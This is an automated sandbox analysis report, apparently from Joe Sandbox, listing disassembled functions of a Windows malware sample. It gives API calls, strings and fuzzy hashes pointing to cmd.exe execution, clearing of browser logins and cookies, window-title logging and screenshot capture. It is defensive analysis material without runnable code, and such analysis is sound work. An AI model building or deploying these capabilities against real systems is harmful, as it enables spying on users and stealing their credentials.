                                • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,(x), ref: 0041363D
                                • RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                • RegCloseKey.ADVAPI32(?), ref: 00413665
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: (x
                                • API String ID: 3677997916-2016957024
                                • Opcode ID: 1fc720c5af09767de5d5cc7bb63512f3198692daef6ba2e2d38df8188ddc2fef
                                • Instruction ID: f34a781dc69553a1478c4d1e38e8143fd29b0d6f10a6f19acb5bd71dd86b2662
                                • Opcode Fuzzy Hash: 1fc720c5af09767de5d5cc7bb63512f3198692daef6ba2e2d38df8188ddc2fef
                                • Instruction Fuzzy Hash: 00F04F75600218FBDF209B90DC05FDD77BCEB04B11F1040A2BA45B5291DB749F849BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 186401046-604454484
                                • Opcode ID: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                • Opcode Fuzzy Hash: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alloca_probe_16__freea
                                • String ID: (x
                                • API String ID: 1635606685-2016957024
                                • Opcode ID: d3b8ec8c6fe5f6eb2882eacf74388bd8eed826f0c70f22c7b35089f58873391c
                                • Instruction ID: 8ea394e19242d531593115f3ad9b67f2d9726ff50e2d779c509e1c2fd2e4051b
                                • Opcode Fuzzy Hash: d3b8ec8c6fe5f6eb2882eacf74388bd8eed826f0c70f22c7b35089f58873391c
                                • Instruction Fuzzy Hash: F141D431A00511EBFF219B65CC42A5F77A4EF55720F65452BF808DB252EB3CD841C66D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                • GetLastError.KERNEL32 ref: 00449F2B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide
                                • String ID: PkGNG
                                • API String ID: 203985260-263838557
                                • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                • Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                • Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
